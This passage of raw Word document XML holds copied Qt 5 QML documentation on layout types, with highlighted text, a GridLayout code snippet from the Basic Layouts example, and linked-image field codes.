        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1035" type="#_x0000_t75" alt="" style="width:222.9pt;height:78.9pt">
            <v:imagedata r:id="rId524" r:href="rId525"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="layout-types"/>
      <w:bookmarkStart w:id="700" w:name="_Toc483000679"/>
      <w:bookmarkStart w:id="701" w:name="_Toc483003696"/>
      <w:bookmarkStart w:id="702" w:name="_Toc483604031"/>
      <w:bookmarkStart w:id="703" w:name="_Toc483605251"/>
      <w:bookmarkEnd w:id="699"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layout Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
      <w:bookmarkEnd w:id="701"/>
      <w:bookmarkEnd w:id="702"/>
      <w:bookmarkEnd w:id="703"/>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layout types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function in a similar way as positioners but allow further refinement or restrictions to the layout.</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>Specifically, the layout types allow you to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00C76116" w:rsidRDefault="00821B8B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set the alignment of text and other items</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00C76116" w:rsidRDefault="00821B8B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resize and fill the allotted application areas automatically</w:t>
      </w:r>
      <w:r w:rsidR="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C76116" w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu</w:t>
      </w:r>
      <w:r w:rsidR="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00C76116" w:rsidRDefault="00821B8B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set size constraints such as minimum or maximum dimensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set the spacing</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between items within the layout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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GroupBox</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id</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gridBox</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title</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Grid layout"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Layout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fillWidth</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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GridLayout</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id</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gridLayout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rows</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3</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flow</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GridLayout</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TopToBottom</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anchors</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fill</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parent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Label</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text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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Line 1"</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Label</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text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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Line 2"</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Label</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text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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Line 3"</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TextField</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TextField</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4375A9"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4375A9">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextField</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="004375A9"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TextArea</w:t>
      </w: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text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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"This widget spans over three rows in the GridLayout.\n"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"All items in the GridLayout are implicitly positioned from top to bottom."</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Layout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rowSpan</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</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Layout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fillHeight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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layout</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fillWidth</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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21B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The snippet above comes from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId526" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Basic Layouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example. The snippet shows the simplicity of adding various fields and items in a layout. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId527" w:history="1">
        <w:r w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
